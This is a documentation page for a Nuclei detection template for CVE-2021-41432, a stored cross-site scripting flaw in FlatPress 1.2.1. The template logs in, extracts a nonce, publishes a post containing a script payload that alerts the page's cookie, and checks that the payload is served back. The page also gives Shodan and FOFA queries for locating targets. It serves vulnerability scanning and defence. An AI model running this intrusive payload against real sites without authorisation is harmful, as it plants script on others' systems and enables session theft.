FlatPress 1.2.1 - Stored Cross-Site Scripting
ID: CVE-2021-41432
Severity: medium
Author: arafatansari
Tags: cve2021,cve,flatpress,xss,authenticated,oss,intrusive
Description
Section titled “Description”FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks.
YAML Source
Section titled “YAML Source”id: CVE-2021-41432
info: name: FlatPress 1.2.1 - Stored Cross-Site Scripting author: arafatansari severity: medium description: | FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website. remediation: | Upgrade to the latest version of FlatPress (1.2.2) or apply the provided patch to fix the XSS vulnerability. reference: - https://github.com/flatpressblog/flatpress/issues/88 - https://nvd.nist.gov/vuln/detail/CVE-2021-41432 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/martinkubecka/CVE-References - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-41432 cwe-id: CWE-79 epss-score: 0.00067 epss-percentile: 0.29279 cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: flatpress product: flatpress shodan-query: - http.html:"Flatpress" - http.html:"flatpress" - http.favicon.hash:-1189292869 fofa-query: - body="flatpress" - icon_hash=-1189292869 tags: cve2021,cve,flatpress,xss,authenticated,oss,intrusive
http: - raw: - | POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp
------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="user"
{{username}} ------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="pass"
{{password}} ------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="submit"
Login ------WebKitFormBoundarykGJmx9vKsePrMkVp-- - | GET /admin.php?p=entry&action=write HTTP/1.1 Host: {{Hostname}} - | POST /admin.php?p=entry&action=write HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
_wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd×tamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish - | GET /index.php/2022/10 HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - contains(body_4, '<p><script>alert(document.cookie)</script></p>') - contains(body_4, 'FlatPress') - contains(header_4, 'text/html') - status_code_4 == 200 condition: and
extractors: - type: regex name: nonce group: 1 regex: - name="_wpnonce" value="([0-9a-z]+)" /> internal: true part: body# digest: 490a0046304402206197d4a1c7b608dea9c1f59914f1c6714296adcda6e0d70de056cefb50cdd84d02204dedd12d3eb2c54778f3133d7167d36475a41faef96f6d0b083ecbb034d5ff48:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-41432.yaml"